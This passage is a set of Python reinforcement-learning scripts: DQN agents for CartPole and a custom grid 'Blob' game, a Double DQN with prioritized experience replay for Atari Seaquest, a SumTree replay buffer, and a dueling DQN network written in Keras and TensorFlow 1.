self.epsilon = max(self.epsilon * self.epsilon_decay, self.epsilon_min)
def load(self, name):
self.model.load_weights(name)
def save(self, name):
self.model.save_weights(name)
if __name__ == "__main__":
env = gym.make("CartPole-v1")
state_size = env.observation_space.shape[0]
action_size = env.action_space.n
agent = DQNAgent(state_size=state_size, action_size=action_size)
done = False
batch_size = 32
scores = []
avg_scores = []
avg_score = 0
for e in range(EPISODES):
state = env.reset()
state = np.reshape(state, (1, state_size))
for t in range(500):
action = agent.act(state)
# print(action)
next_state, reward, done, info = env.step(action)
# punish if not yet finished
reward = reward if not done else -10
next_state = np.reshape(next_state, (1, state_size))
agent.remember(state, action, reward, next_state, done)
state = next_state
if done:
print(f"[{e:4}] avg score:{avg_score:.3f} eps: {agent.epsilon:.2f}")
break
if e % SHOW_EVERY == 0:
env.render()
if len(agent.memory) > batch_size:
agent.replay(batch_size)
scores.append(t)
avg_score = np.average(scores)
avg_scores.append(avg_score)
agent.save("v1.h5")
plt.plot(list(range(EPISODES)), avg_scores)
plt.show()
import numpy as np
import keras.backend.tensorflow_backend as backend
from keras.models import Sequential
from keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Activation, Flatten, LSTM
from keras.optimizers import Adam
from keras.callbacks import TensorBoard
import tensorflow as tf
from collections import deque
import time
import random
from tqdm import tqdm
import os
from PIL import Image
import cv2
import itertools
DISCOUNT = 0.96
REPLAY_MEMORY_SIZE = 50_000 # How many last steps to keep for model training
MIN_REPLAY_MEMORY_SIZE = 1_000 # Minimum number of steps in a memory to start training
MINIBATCH_SIZE = 32 # How many steps (samples) to use for training
UPDATE_TARGET_EVERY = 5 # Terminal states (end of episodes)
MODEL_NAME = '3x128-LSTM-7enemies-'
MIN_REWARD = -200 # For model save
MEMORY_FRACTION = 0.20
# Environment settings
EPISODES = 50_000
# Exploration settings
epsilon = 1.0 # not a constant, going to be decayed
EPSILON_DECAY = 0.999771
MIN_EPSILON = 0.01
# Stats settings
AGGREGATE_STATS_EVERY = 100 # episodes
SHOW_PREVIEW = False
class Blob:
def __init__(self, size):
self.size = size
self.x = np.random.randint(0, size)
self.y = np.random.randint(0, size)
def __str__(self):
return f"Blob ({self.x}, {self.y})"
def __sub__(self, other):
return (self.x-other.x, self.y-other.y)
def __eq__(self, other):
return self.x == other.x and self.y == other.y
def action(self, choice):
'''
Gives us 9 total movement options. (0,1,2,3,4,5,6,7,8)
'''
if choice == 0:
self.move(x=1, y=0)
elif choice == 1:
self.move(x=-1, y=0)
elif choice == 2:
self.move(x=0, y=1)
elif choice == 3:
self.move(x=0, y=-1)
def move(self, x=False, y=False):
# If no value for x, move randomly
if x is False:
self.x += np.random.randint(-1, 2)
else:
self.x += x
# If no value for y, move randomly
if y is False:
self.y += np.random.randint(-1, 2)
else:
self.y += y
# If we are out of bounds, fix!
if self.x < 0:
self.x = 0
elif self.x > self.size-1:
self.x = self.size-1
if self.y < 0:
self.y = 0
elif self.y > self.size-1:
self.y = self.size-1
class BlobEnv:
SIZE = 20
RETURN_IMAGES = False
MOVE_PENALTY = 1
ENEMY_PENALTY = 300
FOOD_REWARD = 25
# if RETURN_IMAGES:
# OBSERVATION_SPACE_VALUES = (SIZE, SIZE, 3) # 4
# else:
# OBSERVATION_SPACE_VALUES = (4,)
ACTION_SPACE_SIZE = 4
PLAYER_N = 1 # player key in dict
FOOD_N = 2 # food key in dict
ENEMY_N = 3 # enemy key in dict
# the dict! (colors)
d = {1: (255, 175, 0),
2: (0, 255, 0),
3: (0, 0, 255)}
def __init__(self, n_enemies=7):
self.n_enemies = n_enemies
self.n_states = len(self.reset())
def reset(self):
self.enemies = []
self.player = Blob(self.SIZE)
self.food = Blob(self.SIZE)
while self.food == self.player:
self.food = Blob(self.SIZE)
for i in range(self.n_enemies):
enemy = Blob(self.SIZE)
while enemy == self.player or enemy == self.food:
enemy = Blob(self.SIZE)
self.enemies.append(enemy)
self.episode_step = 0
if self.RETURN_IMAGES:
observation = np.array(self.get_image())
else:
# all blob's coordinates
observation = [self.player.x, self.player.y, self.food.x, self.food.y] + list(itertools.chain(*[[e.x, e.y] for e in self.enemies]))
return observation
def step(self, action):
self.episode_step += 1
self.player.action(action)
#### MAYBE ###
#enemy.move()
#food.move()
##############
if self.RETURN_IMAGES:
new_observation = np.array(self.get_image())
else:
new_observation = [self.player.x, self.player.y, self.food.x, self.food.y] + list(itertools.chain(*[[e.x, e.y] for e in self.enemies]))
# set the reward to move penalty by default
reward = -self.MOVE_PENALTY
if self.player == self.food:
# if the player hits the food, good reward
reward = self.FOOD_REWARD
else:
for enemy in self.enemies:
if enemy == self.player:
# if the player hits one of the enemies, heavy punishment
reward = -self.ENEMY_PENALTY
break
done = False
if reward == self.FOOD_REWARD or reward == -self.ENEMY_PENALTY or self.episode_step >= 200:
done = True
return new_observation, reward, done
def render(self):
img = self.get_image()
img = img.resize((300, 300)) # resizing so we can see our agent in all its glory.
cv2.imshow("image", np.array(img)) # show it!
cv2.waitKey(1)
# FOR CNN #
def get_image(self):
env = np.zeros((self.SIZE, self.SIZE, 3), dtype=np.uint8) # start an RGB array of our grid size
env[self.food.x][self.food.y] = self.d[self.FOOD_N] # set the food location tile to green
for enemy in self.enemies:
env[enemy.x][enemy.y] = self.d[self.ENEMY_N] # set each enemy location to red
env[self.player.x][self.player.y] = self.d[self.PLAYER_N] # set the player tile to blue
img = Image.fromarray(env, 'RGB') # build the image; cv2.imshow() treats the array as BGR, so the colour tuples above render as named
return img
env = BlobEnv()
# For stats
ep_rewards = [-200]
# For more repetitive results
random.seed(1)
np.random.seed(1)
tf.set_random_seed(1)
# Memory fraction, used mostly when training multiple agents
#gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=MEMORY_FRACTION)
#backend.set_session(tf.Session(config=tf.ConfigProto(gpu_options=gpu_options)))
# Create models folder
if not os.path.isdir('models'):
os.makedirs('models')
# Own Tensorboard class
class ModifiedTensorBoard(TensorBoard):
# Overriding init to set initial step and writer (we want one log file for all .fit() calls)
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.step = 1
self.writer = tf.summary.FileWriter(self.log_dir)
# Overriding this method to stop creating default log writer
def set_model(self, model):
pass
# Overridden to save logs with our step number
# (otherwise every .fit() call would start writing from step 0)
def on_epoch_end(self, epoch, logs=None):
self.update_stats(**logs)
# Overridden; we train for one batch only, so there is nothing to save at batch end
def on_batch_end(self, batch, logs=None):
pass
# Overridden so the writer is not closed
def on_train_end(self, _):
pass
# Custom method for saving own metrics
# Creates writer, writes custom metrics and closes writer
def update_stats(self, **stats):
self._write_logs(stats, self.step)
# Agent class
class DQNAgent:
def __init__(self, state_in_image=True):
self.state_in_image = state_in_image
# Main model
self.model = self.create_model()
# Target network
self.target_model = self.create_model()
self.target_model.set_weights(self.model.get_weights())
# An array with last n steps for training
self.replay_memory = deque(maxlen=REPLAY_MEMORY_SIZE)
# Custom tensorboard object
self.tensorboard = ModifiedTensorBoard(log_dir="logs/{}-{}".format(MODEL_NAME, int(time.time())))
# Used to count when to update target network with main network's weights
self.target_update_counter = 0
def create_model(self):
# get the NN input length
model = Sequential()
if self.state_in_image:
model.add(Conv2D(256, (3, 3), input_shape=env.OBSERVATION_SPACE_VALUES)) # OBSERVATION_SPACE_VALUES = (10, 10, 3) a 10x10 RGB image.
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Conv2D(256, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Flatten()) # this converts our 3D feature maps to 1D feature vectors
model.add(Dense(32))
else:
# model.add(Dense(32, activation="relu", input_shape=(env.n_states,)))
# model.add(Dense(32, activation="relu"))
# model.add(Dropout(0.2))
# model.add(Dense(32, activation="relu"))
# model.add(Dropout(0.2))
model.add(LSTM(128, activation="relu", input_shape=(None, env.n_states,), return_sequences=True))
model.add(Dropout(0.3))
model.add(LSTM(128, activation="relu", return_sequences=True))
model.add(Dropout(0.3))
model.add(LSTM(128, activation="relu", return_sequences=False))
model.add(Dropout(0.3))
model.add(Dense(env.ACTION_SPACE_SIZE, activation='linear')) # ACTION_SPACE_SIZE = how many choices (9)
model.compile(loss="mse", optimizer=Adam(lr=0.001), metrics=['accuracy'])
return model
# Adds step's data to a memory replay array
# (observation space, action, reward, new observation space, done)
def update_replay_memory(self, transition):
self.replay_memory.append(transition)
# Trains main network every step during episode
def train(self, terminal_state, step):
# Start training only if certain number of samples is already saved
if len(self.replay_memory) < MIN_REPLAY_MEMORY_SIZE:
return
# Get a minibatch of random samples from memory replay table
minibatch = random.sample(self.replay_memory, MINIBATCH_SIZE)
# Get current states from minibatch, then query NN model for Q values
if self.state_in_image:
current_states = np.array([transition[0] for transition in minibatch])/255
else:
current_states = np.array([transition[0] for transition in minibatch])
current_qs_list = self.model.predict(np.expand_dims(current_states, axis=1))
# Get future states from minibatch, then query NN model for Q values
# When using target network, query it, otherwise main network should be queried
if self.state_in_image:
new_current_states = np.array([transition[3] for transition in minibatch])/255
else:
new_current_states = np.array([transition[3] for transition in minibatch])
future_qs_list = self.target_model.predict(np.expand_dims(new_current_states, axis=1))
X = []
y = []
# Now we need to enumerate our batches
for index, (current_state, action, reward, new_current_state, done) in enumerate(minibatch):
# If not a terminal state, get new q from future states, otherwise set it to 0
# almost like with Q Learning, but we use just part of equation here
if not done:
max_future_q = np.max(future_qs_list[index])
new_q = reward + DISCOUNT * max_future_q
else:
new_q = reward
# Update Q value for given state
current_qs = current_qs_list[index]
current_qs[action] = new_q
# And append to our training data
X.append(current_state)
y.append(current_qs)
# Fit on all samples as one batch, log only on terminal state
if self.state_in_image:
self.model.fit(np.array(X)/255, np.array(y), batch_size=MINIBATCH_SIZE, verbose=0, shuffle=False, callbacks=[self.tensorboard] if terminal_state else None)
else:
# self.model.fit(np.array(X), np.array(y), batch_size=MINIBATCH_SIZE, verbose=0, shuffle=False, callbacks=[self.tensorboard] if terminal_state else None)
self.model.fit(np.expand_dims(X, axis=1), np.array(y), batch_size=MINIBATCH_SIZE, verbose=0, shuffle=False, callbacks=[self.tensorboard] if terminal_state else None)
# Update target network counter every episode
if terminal_state:
self.target_update_counter += 1
# If counter reaches set value, update target network with weights of main network
if self.target_update_counter > UPDATE_TARGET_EVERY:
self.target_model.set_weights(self.model.get_weights())
self.target_update_counter = 0
# Queries main network for Q values given current observation space (environment state)
def get_qs(self, state):
if self.state_in_image:
return self.model.predict(np.array(state).reshape(-1, *state.shape)/255)[0]
else:
# return self.model.predict(np.array(state).reshape(1, env.n_states))[0]
return self.model.predict(np.array(state).reshape(1, 1, env.n_states))[0]
agent = DQNAgent(state_in_image=False)
print("Number of states:", env.n_states)
# agent.model.load_weights("models/2x32____22.00max___-2.44avg_-200.00min__1563463022.model")
# Iterate over episodes
for episode in tqdm(range(1, EPISODES + 1), ascii=True, unit='episodes'):
# Update tensorboard step every episode
agent.tensorboard.step = episode
# Restarting episode - reset episode reward and step number
episode_reward = 0
step = 1
# Reset environment and get initial state
current_state = env.reset()
# Reset flag and start iterating until episode ends
done = False
while not done:
# This part stays mostly the same, the change is to query a model for Q values
if np.random.random() > epsilon:
# Get action from Q table
action = np.argmax(agent.get_qs(current_state))
else:
# Get random action
action = np.random.randint(0, env.ACTION_SPACE_SIZE)
new_state, reward, done = env.step(action)
# accumulate the reward for this step
episode_reward += reward
if SHOW_PREVIEW and not episode % AGGREGATE_STATS_EVERY:
env.render()
# Every step we update replay memory and train main network
agent.update_replay_memory((current_state, action, reward, new_state, done))
agent.train(done, step)
current_state = new_state
step += 1
# Append episode reward to a list and log stats (every given number of episodes)
ep_rewards.append(episode_reward)
if not episode % AGGREGATE_STATS_EVERY or episode == 1:
average_reward = sum(ep_rewards[-AGGREGATE_STATS_EVERY:])/len(ep_rewards[-AGGREGATE_STATS_EVERY:])
min_reward = min(ep_rewards[-AGGREGATE_STATS_EVERY:])
max_reward = max(ep_rewards[-AGGREGATE_STATS_EVERY:])
agent.tensorboard.update_stats(reward_avg=average_reward, reward_min=min_reward, reward_max=max_reward, epsilon=epsilon)
# Save model, but only when the average reward is greater than or equal to a set value
if average_reward >= -220:
agent.model.save(f'models/{MODEL_NAME}__{max_reward:_>7.2f}max_{average_reward:_>7.2f}avg_{min_reward:_>7.2f}min__{int(time.time())}.model')
# Decay epsilon
if epsilon > MIN_EPSILON:
epsilon *= EPSILON_DECAY
epsilon = max(MIN_EPSILON, epsilon)
agent.model.save(f'models/{MODEL_NAME}__{max_reward:_>7.2f}max_{average_reward:_>7.2f}avg_{min_reward:_>7.2f}min__{int(time.time())}.model')
# OpenGym Seaquest-v0
# -------------------
#
# This code demonstrates a Double DQN network with Priority Experience Replay
# in an OpenGym Seaquest-v0 environment.
#
# Made as part of blog series Let's make a DQN, available at:
# https://jaromiru.com/2016/11/07/lets-make-a-dqn-double-learning-and-prioritized-experience-replay/
#
# author: Jaromir Janisch, 2016
import matplotlib
import random, numpy, math, gym, scipy.misc
import tensorflow as tf
from keras import backend as K
import time
from SumTree import SumTree
from keras.callbacks import TensorBoard
from collections import deque
import tqdm
IMAGE_WIDTH = 84
IMAGE_HEIGHT = 84
IMAGE_STACK = 2
HUBER_LOSS_DELTA = 2.0
LEARNING_RATE = 0.00045
#-------------------- Modified Tensorboard -----------------------
class RLTensorBoard(TensorBoard):
def __init__(self, **kwargs):
"""
Overriding init to set initial step and writer (one log file for multiple .fit() calls)
"""
super().__init__(**kwargs)
self.step = 1
self.writer = tf.summary.FileWriter(self.log_dir)
def set_model(self, model):
"""
Overriding this method to stop creating default log writer
"""
pass
def on_epoch_end(self, epoch, logs=None):
"""
Overridden to save logs with our step number
(otherwise every .fit() call would start from step 0)
"""
self.update_stats(**logs)
def on_batch_end(self, batch, logs=None):
"""
Overridden; we train for one batch only, so there is nothing to save at batch end
"""
pass
def on_train_end(self, _):
"""
Overridden so the writer is not closed
"""
pass
def update_stats(self, **stats):
"""
Custom method for saving own metrics
Creates writer, writes custom metrics and closes writer
"""
self._write_logs(stats, self.step)
#-------------------- UTILITIES -----------------------
def huber_loss(y_true, y_pred):
err = y_true - y_pred
cond = K.abs(err) < HUBER_LOSS_DELTA
L2 = 0.5 * K.square(err)
L1 = HUBER_LOSS_DELTA * (K.abs(err) - 0.5 * HUBER_LOSS_DELTA)
loss = tf.where(cond, L2, L1) # Keras does not cover where function in tensorflow :-(
return K.mean(loss)
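# with HUBER_LOSS_DELTA = 2.0 the loss is quadratic for small errors (err=1 -> 0.5)
# and linear for large ones (err=10 -> 2 * (10 - 1) = 18), so outlier TD errors
# don't dominate the gradient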
def processImage( img ):
rgb = scipy.misc.imresize(img, (IMAGE_WIDTH, IMAGE_HEIGHT), interp='bilinear')
r, g, b = rgb[:,:,0], rgb[:,:,1], rgb[:,:,2]
gray = 0.2989 * r + 0.5870 * g + 0.1140 * b # extract luminance
o = gray.astype('float32') / 128 - 1 # normalize
return o
#-------------------- BRAIN ---------------------------
from keras.models import Sequential
from keras.layers import *
from keras.optimizers import *
model_name = "conv2dx3"
class Brain:
def __init__(self, stateCnt, actionCnt):
self.stateCnt = stateCnt
self.actionCnt = actionCnt
self.model = self._createModel()
self.model_ = self._createModel() # target network
# custom tensorboard
self.tensorboard = RLTensorBoard(log_dir="logs/{}-{}".format(model_name, int(time.time())))
def _createModel(self):
model = Sequential()
model.add(Conv2D(32, (8, 8), strides=(4,4), activation='relu', input_shape=(self.stateCnt), data_format='channels_first'))
model.add(Conv2D(64, (4, 4), strides=(2,2), activation='relu'))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(Flatten())
model.add(Dense(units=512, activation='relu'))
model.add(Dense(units=self.actionCnt, activation='linear'))
opt = RMSprop(lr=LEARNING_RATE)
model.compile(loss=huber_loss, optimizer=opt)
return model
def train(self, x, y, epochs=1, verbose=0):
self.model.fit(x, y, batch_size=32, epochs=epochs, verbose=verbose, callbacks=[self.tensorboard])
def predict(self, s, target=False):
if target:
return self.model_.predict(s)
else:
return self.model.predict(s)
def predictOne(self, s, target=False):
return self.predict(s.reshape(1, IMAGE_STACK, IMAGE_WIDTH, IMAGE_HEIGHT), target).flatten()
def updateTargetModel(self):
self.model_.set_weights(self.model.get_weights())
#-------------------- MEMORY --------------------------
class Memory: # stored as ( s, a, r, s_ ) in SumTree
e = 0.01
a = 0.6
def __init__(self, capacity):
self.tree = SumTree(capacity)
def _getPriority(self, error):
return (error + self.e) ** self.a
def add(self, error, sample):
p = self._getPriority(error)
self.tree.add(p, sample)
def sample(self, n):
batch = []
segment = self.tree.total() / n
for i in range(n):
a = segment * i
b = segment * (i + 1)
s = random.uniform(a, b)
(idx, p, data) = self.tree.get(s)
batch.append( (idx, data) )
return batch
def update(self, idx, error):
p = self._getPriority(error)
self.tree.update(idx, p)
#-------------------- AGENT ---------------------------
MEMORY_CAPACITY = 50_000
BATCH_SIZE = 32
GAMMA = 0.95
MAX_EPSILON = 1
MIN_EPSILON = 0.05
EXPLORATION_STOP = 500_000 # at this step epsilon will be 0.01
LAMBDA = - math.log(0.01) / EXPLORATION_STOP # speed of decay
UPDATE_TARGET_FREQUENCY = 10_000
UPDATE_STATS_EVERY = 5
RENDER_EVERY = 50
class Agent:
steps = 0
epsilon = MAX_EPSILON
def __init__(self, stateCnt, actionCnt, brain):
self.stateCnt = stateCnt
self.actionCnt = actionCnt
self.brain = brain
# self.memory = Memory(MEMORY_CAPACITY)
def act(self, s):
if random.random() < self.epsilon:
return random.randint(0, self.actionCnt-1)
else:
return numpy.argmax(self.brain.predictOne(s))
def observe(self, sample): # in (s, a, r, s_) format
x, y, errors = self._getTargets([(0, sample)])
self.memory.add(errors[0], sample)
if self.steps % UPDATE_TARGET_FREQUENCY == 0:
self.brain.updateTargetModel()
# slowly decrease epsilon based on our experience
self.steps += 1
self.epsilon = MIN_EPSILON + (MAX_EPSILON - MIN_EPSILON) * math.exp(-LAMBDA * self.steps)
def _getTargets(self, batch):
no_state = numpy.zeros(self.stateCnt)
states = numpy.array([ o[1][0] for o in batch ])
states_ = numpy.array([ (no_state if o[1][3] is None else o[1][3]) for o in batch ])
p = agent.brain.predict(states)
p_ = agent.brain.predict(states_, target=False)
pTarget_ = agent.brain.predict(states_, target=True)
x = numpy.zeros((len(batch), IMAGE_STACK, IMAGE_WIDTH, IMAGE_HEIGHT))
y = numpy.zeros((len(batch), self.actionCnt))
errors = numpy.zeros(len(batch))
for i in range(len(batch)):
o = batch[i][1]
s = o[0]; a = o[1]; r = o[2]; s_ = o[3]
t = p[i]
oldVal = t[a]
if s_ is None:
t[a] = r
else:
t[a] = r + GAMMA * pTarget_[i][ numpy.argmax(p_[i]) ] # double DQN
x[i] = s
y[i] = t
errors[i] = abs(oldVal - t[a])
return (x, y, errors)
def replay(self):
batch = self.memory.sample(BATCH_SIZE)
x, y, errors = self._getTargets(batch)
# update errors
for i in range(len(batch)):
idx = batch[i][0]
self.memory.update(idx, errors[i])
self.brain.train(x, y)
class RandomAgent:
memory = Memory(MEMORY_CAPACITY)
exp = 0
epsilon = MAX_EPSILON
def __init__(self, actionCnt, brain):
self.actionCnt = actionCnt
self.brain = brain
def act(self, s):
return random.randint(0, self.actionCnt-1)
def observe(self, sample): # in (s, a, r, s_) format
error = abs(sample[2]) # reward
self.memory.add(error, sample)
self.exp += 1
def replay(self):
pass
#-------------------- ENVIRONMENT ---------------------
class Environment:
def __init__(self, problem):
self.problem = problem
self.env = gym.make(problem)
self.ep_rewards = deque(maxlen=UPDATE_STATS_EVERY)
def run(self, agent, step):
img = self.env.reset()
w = processImage(img)
s = numpy.array([w, w])
agent.brain.tensorboard.step = step
R = 0
while True:
if step % RENDER_EVERY == 0:
self.env.render()
a = agent.act(s)
img, r, done, info = self.env.step(a)
s_ = numpy.array([s[1], processImage(img)]) #last two screens
r = numpy.clip(r, -1, 1) # clip reward to [-1, 1]
if done: # terminal state
s_ = None
agent.observe( (s, a, r, s_) )
agent.replay()
s = s_
R += r
if done:
break
self.ep_rewards.append(R)
avg_reward = sum(self.ep_rewards) / len(self.ep_rewards)
if step % UPDATE_STATS_EVERY == 0:
min_reward = min(self.ep_rewards)
max_reward = max(self.ep_rewards)
agent.brain.tensorboard.update_stats(reward_avg=avg_reward, reward_min=min_reward, reward_max=max_reward, epsilon=agent.epsilon)
agent.brain.model.save(f"models/{model_name}-avg-{avg_reward:.2f}-min-{min_reward:.2f}-max-{max_reward:2f}.h5")
# print("Total reward:", R)
return avg_reward
#-------------------- MAIN ----------------------------
PROBLEM = 'Seaquest-v0'
env = Environment(PROBLEM)
episodes = 2_000
stateCnt = (IMAGE_STACK, IMAGE_WIDTH, IMAGE_HEIGHT)
actionCnt = env.env.action_space.n
brain = Brain(stateCnt, actionCnt)
agent = Agent(stateCnt, actionCnt, brain)
randomAgent = RandomAgent(actionCnt, brain)
step = 0
try:
print("Initialization with random agent...")
while randomAgent.exp < MEMORY_CAPACITY:
step += 1
env.run(randomAgent, step)
print(randomAgent.exp, "/", MEMORY_CAPACITY)
agent.memory = randomAgent.memory
randomAgent = None
print("Starting learning")
for i in tqdm.tqdm(list(range(step+1, episodes+step+1))):
env.run(agent, i)
finally:
agent.brain.model.save("Seaquest-DQN-PER.h5")
import numpy as np
class SumTree:
"""
This SumTree code is modified version of Morvan Zhou:
https://github.com/MorvanZhou/Reinforcement-learning-with-tensorflow/blob/master/contents/5.2_Prioritized_Replay_DQN/RL_brain.py
"""
data_pointer = 0
def __init__(self, length):
# number of leaf nodes (final nodes that contain the experiences)
self.length = length
# generate the tree with all nodes' value = 0
# binary node (each node has max 2 children) so 2x size of leaf capacity - 1
# parent nodes = length - 1
# leaf nodes = length
self.tree = np.zeros(2*self.length - 1)
# contains the experiences
self.data = np.zeros(self.length, dtype=object)
def add(self, priority, data):
"""
Add priority score in the sumtree leaf and add the experience in data
"""
# look at what index we want to put the experience
tree_index = self.data_pointer + self.length - 1
#tree:
# 0
# / \
# 0 0
# / \ / \
#tree_index 0 0 0 We fill the leaves from left to right
self.data[self.data_pointer] = data
# update the leaf
self.update(tree_index, priority)
# increment data pointer
self.data_pointer += 1
# if we're above the capacity, we go back to the first index
if self.data_pointer >= self.length:
self.data_pointer = 0
def update(self, tree_index, priority):
"""
Update the leaf priority score and propagate the change through the tree
"""
# change = new priority score - former priority score
change = priority - self.tree[tree_index]
self.tree[tree_index] = priority
while tree_index != 0: # this method is faster than the recursive loop in the reference code
"""
Here we want to access the line above
THE NUMBERS IN THIS TREE ARE THE INDEXES NOT THE PRIORITY VALUES
0
/ \
1 2
/ \ / \
3 4 5 [6]
If we are in leaf at index 6, we updated the priority score
We need then to update index 2 node
So tree_index = (tree_index - 1) // 2
tree_index = (6-1)//2
tree_index = 2 (because // rounds the result down)
"""
tree_index = (tree_index - 1) // 2
self.tree[tree_index] += change
"""
Here we get the leaf_index, priority value of that leaf and experience associated with that index
"""
def get_leaf(self, v):
"""
Tree structure and array storage:
Tree index:
0 -> storing priority sum
/ \
1 2
/ \ / \
3 4 5 6 -> storing priority for experiences
Array type for storing:
[0,1,2,3,4,5,6]
"""
parent_index = 0
while True: # the while loop is faster than the method in the reference code
left_child_index = 2 * parent_index + 1
right_child_index = left_child_index + 1
# If we reach bottom, end the search
if left_child_index >= len(self.tree):
leaf_index = parent_index
break
else: # downward search, always search for a higher priority node
if v <= self.tree[left_child_index]:
parent_index = left_child_index
else:
v -= self.tree[left_child_index]
parent_index = right_child_index
data_index = leaf_index - self.length + 1
return leaf_index, self.tree[leaf_index], self.data[data_index]
@property
def total_priority(self):
return self.tree[0] # Returns the root node
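# --- illustration (not part of the original code): a minimal SumTree walk-through.
# With length=4 the tree array has 2*4-1 = 7 nodes; leaves live at indices 3..6 and
# the root (index 0) always holds the sum of all leaf priorities.
_demo_tree = SumTree(length=4)
_demo_tree.add(priority=1.0, data="a")
_demo_tree.add(priority=3.0, data="b")
assert _demo_tree.total_priority == 4.0      # root == sum of the leaf priorities
# get_leaf(v) walks down: go left while v <= left-child sum, otherwise subtract it and go right,
# so v = 3.5 lands in the second leaf ("b"), which owns the (1.0, 4.0] slice of the range.
assert _demo_tree.get_leaf(3.5)[2] == "b"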
class Memory:
# we use this to avoid experiences ever having a probability of 0 of being picked
PER_e = 0.01
# we use this to make a tradeoff between taking only experiences with high priority
# and sampling randomly
PER_a = 0.6
# we use this for importance sampling, annealed from this value up to 1 during training
PER_b = 0.4
PER_b_increment_per_sample = 0.001
absolute_error_upper = 1.0
def __init__(self, capacity):
# the memory is composed of a sum tree that holds the priority scores at its leaves,
# plus a data array that holds the experiences themselves
# we don't use a deque here because it would shift every experience's index by one at each timestep;
# we prefer a simple array that we overwrite when the memory is full
self.tree = SumTree(length=capacity)
def store(self, experience):
"""
Store a new experience in our tree
Each new experience has a score of max_priority (it will then be improved during training)
"""
# find the max priority
max_priority = np.max(self.tree.tree[-self.tree.length:])
# if the max priority is 0 we can't use it, since that experience would never have a chance to be picked,
# so we use a minimum priority instead
if max_priority == 0:
max_priority = self.absolute_error_upper
# set the max p for new p
self.tree.add(max_priority, experience)
def sample(self, n):
"""
- First, to sample a minibatch of size k, the range [0, priority_total] is divided into k ranges.
- Then a value is uniformly sampled from each range.
- We search the sumtree for the experiences whose priority scores correspond to the sampled values.
- Finally, we calculate the IS weights for each minibatch element.
"""
# create a sample list that will contain the minibatch
memory = []
b_idx, b_is_weights = np.zeros((n, ), dtype=np.int32), np.zeros((n, 1), dtype=np.float32)
# calculate the priority segment
# here, as explained in the paper, we divide the range [0, ptotal] into n ranges
priority_segment = self.tree.total_priority / n
# increase b each time
self.PER_b = np.min([1., self.PER_b + self.PER_b_increment_per_sample])
# calculating the max weight
p_min = np.min(self.tree.tree[-self.tree.length:]) / self.tree.total_priority
max_weight = (p_min * n) ** (-self.PER_b)
for i in range(n):
a, b = priority_segment * i, priority_segment * (i + 1)
value = np.random.uniform(a, b)
# experience that correspond to each value is retrieved
index, priority, data = self.tree.get_leaf(value)
# P(j)
sampling_probs = priority / self.tree.total_priority
# IS = (1/N * 1/P(i))**b /max wi == (N*P(i))**-b /max wi
b_is_weights[i, 0] = np.power(n * sampling_probs, -self.PER_b)/ max_weight
b_idx[i]= index
experience = [data]
memory.append(experience)
return b_idx, memory, b_is_weights
def batch_update(self, tree_idx, abs_errors):
"""
Update the priorities on the tree
"""
abs_errors += self.PER_e
clipped_errors = np.minimum(abs_errors, self.absolute_error_upper)  # element-wise clip at the upper bound
ps = np.power(clipped_errors, self.PER_a)
for ti, p in zip(tree_idx, ps):
self.tree.update(ti, p)
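# --- illustration (not part of the original code): the importance-sampling weight used
# in Memory.sample above is w_i = (N * P(i))**(-b) / max_w, normalised so that the
# largest possible weight is 1. A tiny numeric check with made-up priorities:
_demo_p = np.array([1.0, 3.0])                     # leaf priorities
_demo_P = _demo_p / _demo_p.sum()                  # sampling probabilities P(i)
_demo_b, _demo_N = 0.4, len(_demo_p)               # PER_b at the start of training
_demo_max_w = (_demo_P.min() * _demo_N) ** (-_demo_b)
_demo_w = (_demo_N * _demo_P) ** (-_demo_b) / _demo_max_w
# the rarest (lowest-priority) transition gets weight 1.0, the common one gets less
assert abs(_demo_w[0] - 1.0) < 1e-9 and _demo_w[1] < 1.0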
import tensorflow as tf
class DDDQNNet:
""" Dueling Double Deep Q Neural Network """
def __init__(self, state_size, action_size, learning_rate, name):
self.state_size = state_size
self.action_size = action_size
self.learning_rate = learning_rate
self.name = name
# we use tf.variable_scope to know which network we're using (DQN or the Target net)
# it'll be helpful when we update our w- parameters (by copying the DQN parameters)
with tf.variable_scope(self.name):
# we create the placeholders
self.inputs_ = tf.placeholder(tf.float32, [None, *state_size], name="inputs")
self.is_weights_ = tf.placeholder(tf.float32, [None, 1], name="is_weights")
self.actions_ = tf.placeholder(tf.float32, [None, self.action_size], name="actions_")
# target Q
self.target_q = tf.placeholder(tf.float32, [None], name="target")
# neural net
self.dense1 = tf.layers.dense(inputs=self.inputs_,
units=32,
name="dense1",
kernel_initializer=tf.contrib.layers.xavier_initializer(),
activation="relu")
self.dense2 = tf.layers.dense(inputs=self.dense1,
units=32,
name="dense2",
kernel_initializer=tf.contrib.layers.xavier_initializer(),
activation="relu")
self.dense3 = tf.layers.dense(inputs=self.dense2,
units=32,
name="dense3",
kernel_initializer=tf.contrib.layers.xavier_initializer())
# here we separate into two streams (dueling)
# this one is State-Function V(s)
self.value = tf.layers.dense(inputs=self.dense3,
units=1,
kernel_initializer=tf.contrib.layers.xavier_initializer(),
activation=None,
name="value"
)
# and this one is the Advantage-Function A(s, a)
self.advantage = tf.layers.dense(inputs=self.dense3,
units=self.action_size,
activation=None,
kernel_initializer=tf.contrib.layers.xavier_initializer(),
name="advantage"
)
# aggregation
# Q(s, a) = V(s) + ( A(s, a) - 1/|A| * sum A(s, a') )
self.output = self.value + tf.subtract(self.advantage, tf.reduce_mean(self.advantage, axis=1, keepdims=True))
# Q is our predicted Q value
self.Q = tf.reduce_sum(tf.multiply(self.output, self.actions_), axis=1)
self.absolute_errors = tf.abs(self.target_q - self.Q)
# w- * (target_q - q)**2
self.loss = tf.reduce_mean(self.is_weights_ * tf.squared_difference(self.target_q, self.Q))
self.optimizer = tf.train.RMSPropOptimizer(self.learning_rate).minimize(self.loss)
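# --- illustration (not part of the original code): the dueling aggregation above,
# Q(s, a) = V(s) + (A(s, a) - mean_a' A(s, a')), reproduced with plain numpy so the
# mean-subtraction (which keeps V and A identifiable) is easy to see. Numbers are made up.
import numpy as _np_demo
_demo_V = _np_demo.array([[2.0]])                  # state value, shape (batch, 1)
_demo_A = _np_demo.array([[1.0, -1.0, 0.0]])       # advantages, shape (batch, n_actions)
_demo_Q = _demo_V + (_demo_A - _demo_A.mean(axis=1, keepdims=True))
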